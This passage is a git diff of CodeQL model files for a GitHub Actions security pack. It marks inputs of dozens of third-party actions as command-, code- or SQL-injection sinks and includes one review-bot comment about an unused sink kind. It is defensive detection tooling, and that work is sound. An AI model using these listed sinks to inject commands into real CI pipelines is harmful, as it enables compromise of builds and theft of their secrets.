+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["blackducksoftware/github-action", "*", "input.args", "command-injection"]
+ - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection"]
+ - ["blackducksoftware/github-action", "*", "input.blackduck.api.token", "command-injection"]
diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml
index ee8e6abef097..7d5f699a0e98 100644
--- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml
+++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml
@@ -4,3 +4,9 @@ extensions:
 extensible: summaryModel
 data:
 - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection"]
+ - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection"]
diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml
index c58b5a1e1d2e..aeda79986314 100644
--- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml
+++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml
@@ -4,3 +4,8 @@ extensions:
 extensible: summaryModel
 data:
 - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection"]
diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml
new file mode 100644
index 000000000000..38b18cf6cac8
--- /dev/null
+++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection"]
+ - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection"]
diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml
index 1c6584eb9d5d..2e4291eb480c 100644
--- a/ql/lib/ext/cachix_cachix-action.model.yml
+++ b/ql/lib/ext/cachix_cachix-action.model.yml
@@ -4,3 +4,9 @@ extensions:
 extensible: summaryModel
 data:
 - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["cachix/cachix-action", "*", "input.installCommand", "command-injection"]
+ - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml
new file mode 100644
index 000000000000..3be7669275c6
--- /dev/null
+++ b/ql/lib/ext/changesets_action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["changesets/action", "*", "input.publish", "command-injection"]
+ - ["changesets/action", "*", "input.version", "command-injection"]
diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml
new file mode 100644
index 000000000000..cb0870b4883f
--- /dev/null
+++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection"]
+ - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection"]
diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml
new file mode 100644
index 000000000000..30e59e91d60c
--- /dev/null
+++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection"]
diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml
index d4e35196c6c1..f3b021d226b9 100644
--- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml
+++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"]
+ - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"]
\ No newline at end of file
diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml
new file mode 100644
index 000000000000..25df02dacaa6
--- /dev/null
+++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection"]
+ - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection"]
+ - ["cycjimmy/semantic-release-action", "*", "input.extends", "command-injection"]
diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml
new file mode 100644
index 000000000000..2fda092f20a5
--- /dev/null
+++ b/ql/lib/ext/cypress-io_github-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sourceModel
+ data:
+ - ["cypress-io/github-action", "*", "env.GH_BRANCH", "pull_request_target", "PR branch"]
diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml
new file mode 100644
index 000000000000..324171f3c4b0
--- /dev/null
+++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection"]
+ - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection"]
diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml
new file mode 100644
index 000000000000..cc5c311eea73
--- /dev/null
+++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection"]
diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml
new file mode 100644
index 000000000000..f45aae02158d
--- /dev/null
+++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection"]
+ - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection"]
diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml
new file mode 100644
index 000000000000..7445d673fcf7
--- /dev/null
+++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml
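Review bot: The two dailydotdev/action-devcard rows use the sink kind `sql-injection`, which no other model in this commit uses; every other sinkModel row here is `command-injection` or `code-injection`. I cannot see from this chunk whether any query (the ExpressionInjection.ql touched by this commit, or another) selects sinks of kind `sql-injection`, so as written these two rows may never be matched and the inputs would go unreported. Either confirm that a consumer reads that kind and add a one-line `#` comment above the rows saying which query does, or change the kind to the one the queries actually read.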
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection"]
+ - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection"]
diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml
new file mode 100644
index 000000000000..a8a54dbda292
--- /dev/null
+++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sourceModel
+ data:
+ - ["dawidd6/action-download-artifact", "*", "output.artifacts", "*", "Artifact details"]
diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml
index 2aa6013c872a..82f491390d2e 100644
--- a/ql/lib/ext/delaguardo_setup-clojure.model.yml
+++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"]
+ - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"]
\ No newline at end of file
diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml
new file mode 100644
index 000000000000..430a96f6cbef
--- /dev/null
+++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml
@@ -0,0 +1,11 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-pr", "command-injection"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-branch", "command-injection"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-revision", "command-injection"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-binary", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml
new file mode 100644
index 000000000000..37bcf2cc7815
--- /dev/null
+++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection"]
+ - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection"]
+ - ["docker-practice/actions-setup-docker", "*", "input.docker_daemon_json", "command-injection"]
diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml
new file mode 100644
index 000000000000..77eaf3ae10f8
--- /dev/null
+++ b/ql/lib/ext/docker_build-push-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["docker/build-push-action", "*", "input.context", "code-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml
new file mode 100644
index 000000000000..63cdb2a496b0
--- /dev/null
+++ b/ql/lib/ext/endbug_latest-tag.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["endbug/latest-tag", "*", "input.ref", "command-injection"]
+ - ["endbug/latest-tag", "*", "input.tag-name", "command-injection"]
+ - ["endbug/latest-tag", "*", "input.git-directory", "command-injection"]
+ - ["endbug/latest-tag", "*", "input.description", "command-injection"]
diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml
new file mode 100644
index 000000000000..d0bcbb4da989
--- /dev/null
+++ b/ql/lib/ext/expo_expo-github-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["expo/expo-github-action", "*", "input.command", "command-injection"]
+ - ["expo/expo-github-action", "*", "input.packager", "command-injection"]
diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml
new file mode 100644
index 000000000000..6418e71f22a4
--- /dev/null
+++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection"]
diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml
new file mode 100644
index 000000000000..86705319e23d
--- /dev/null
+++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection"]
+ - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml
new file mode 100644
index 000000000000..61fdcd9254a4
--- /dev/null
+++ b/ql/lib/ext/game-ci_unity-builder.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection"]
+ - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection"]
diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml
index ab413b6e9759..2d142d98099b 100644
--- a/ql/lib/ext/game-ci_unity-test-runner.model.yml
+++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"]
+ - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"]
\ No newline at end of file
diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml
new file mode 100644
index 000000000000..1727ca60e258
--- /dev/null
+++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml
new file mode 100644
index 000000000000..146f4a17a559
--- /dev/null
+++ b/ql/lib/ext/go-semantic-release_action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["go-semantic-release/action", "*", "input.bin", "command-injection"]
diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml
new file mode 100644
index 000000000000..8c0f7a5ad614
--- /dev/null
+++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["golangci/golangci-lint-action", "*", "input.version", "command-injection"]
diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml
new file mode 100644
index 000000000000..9c7c03b9f357
--- /dev/null
+++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection"]
+ - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection"]
diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml
new file mode 100644
index 000000000000..9d9eac38af01
--- /dev/null
+++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection"]
diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml
new file mode 100644
index 000000000000..4c74301d1c35
--- /dev/null
+++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection"]
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection"]
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.commit-message", "command-injection"]
+ - ["gr2m/create-or-update-pull-request-action", "*", "input.author", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml
new file mode 100644
index 000000000000..6332cbfdad8e
--- /dev/null
+++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection"]
+ - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection"]
+ - ["ilammy/msvc-dev-cmd", "*", "input.sdk", "command-injection"]
+ - ["ilammy/msvc-dev-cmd", "*", "input.toolset", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml
new file mode 100644
index 000000000000..f8b8490c2135
--- /dev/null
+++ b/ql/lib/ext/ilammy_setup-nasm.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["ilammy/setup-nasm", "*", "input.version", "command-injection"]
+ - ["ilammy/setup-nasm", "*", "input.destination", "command-injection"]
diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml
new file mode 100644
index 000000000000..64024ef5c72d
--- /dev/null
+++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["imjohnbo/issue-bot", "*", "input.body", "code-injection"] + - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection"] + - ["imjohnbo/issue-bot", "*", "input.linked-comments-new-issue-text", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml new file mode 100644 index 000000000000..1771ac2bad05 --- /dev/null +++ b/ql/lib/ext/iterative_setup-cml.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["iterative/setup-cml", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml new file mode 100644 index 000000000000..e8600c6f7df5 --- /dev/null +++ b/ql/lib/ext/iterative_setup-dvc.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["iterative/setup-dvc", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml new file mode 100644 index 000000000000..2ab70905db16 --- /dev/null +++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.git-config-email", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.git-config-name", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.target-folder", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.tag", "command-injection"] diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml new file mode 100644 index 000000000000..948be24b45cd --- /dev/null +++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml new file mode 100644 index 000000000000..928c1f918d3f --- /dev/null +++ b/ql/lib/ext/jurplel_install-qt-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jurplel/install-qt-action", "*", "input.version", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.arch", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.dir", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.aqtversion", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.py7zrversion", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.extra", "command-injection"] 
diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index b237ac313d2a..ad95f1f323a7 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -4,3 +4,10 @@ extensions: extensible: summaryModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection"] + - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection"] + - ["jwalton/gh-ecr-push", "*", "input.region", "command-injection"] diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml new file mode 100644 index 000000000000..b3cb5aa39407 --- /dev/null +++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection"] + - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection"] diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml new file mode 100644 index 000000000000..a84880cfdf10 --- /dev/null +++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection"] diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml new file mode 100644 index 000000000000..f32484a4f0d3 --- /dev/null +++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml new file mode 100644 index 000000000000..9ce43e68a757 --- /dev/null +++ b/ql/lib/ext/magefile_mage-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["magefile/mage-action", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml new file mode 100644 index 000000000000..ac3aaa67def0 --- /dev/null +++ b/ql/lib/ext/maierj_fastlane-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["maierj/fastlane-action", "*", "input.lane", "command-injection"] + - ["maierj/fastlane-action", "*", "input.options", "command-injection"] + - ["maierj/fastlane-action", "*", "input.env", "command-injection"] diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml new file mode 100644 index 000000000000..90fd673c705b --- /dev/null +++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection"] + - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection"] + - ["manusa/actions-setup-minikube", "*", "input.container_runtime", "command-injection"] + - ["manusa/actions-setup-minikube", "*", "input.start_args", "command-injection"] 
diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index 91741f587063..2c9f46b46f45 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -5,3 +5,12 @@ extensions: data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint"] - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection"] + - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection"] + - ["mattdavis0351/actions", "*", "input.image-name", "command-injection"] + - ["mattdavis0351/actions", "*", "input.dockerfile-name", "command-injection"] + - ["mattdavis0351/actions", "*", "input.tag", "command-injection"] diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml new file mode 100644 index 000000000000..1bcf8e7ce7ab --- /dev/null +++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection"] diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml new file mode 100644 index 000000000000..817067445681 --- /dev/null +++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection"] + - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection"] 
diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml new file mode 100644 index 000000000000..aeca6db0d98d --- /dev/null +++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.labels", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.target", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.directory", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.platform", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.image", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.registry", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.dockerfile", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.githubOrg", "command-injection"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.username", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml new file mode 100644 index 000000000000..b9358bd2d69a --- /dev/null +++ b/ql/lib/ext/msys2_setup-msys2.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: 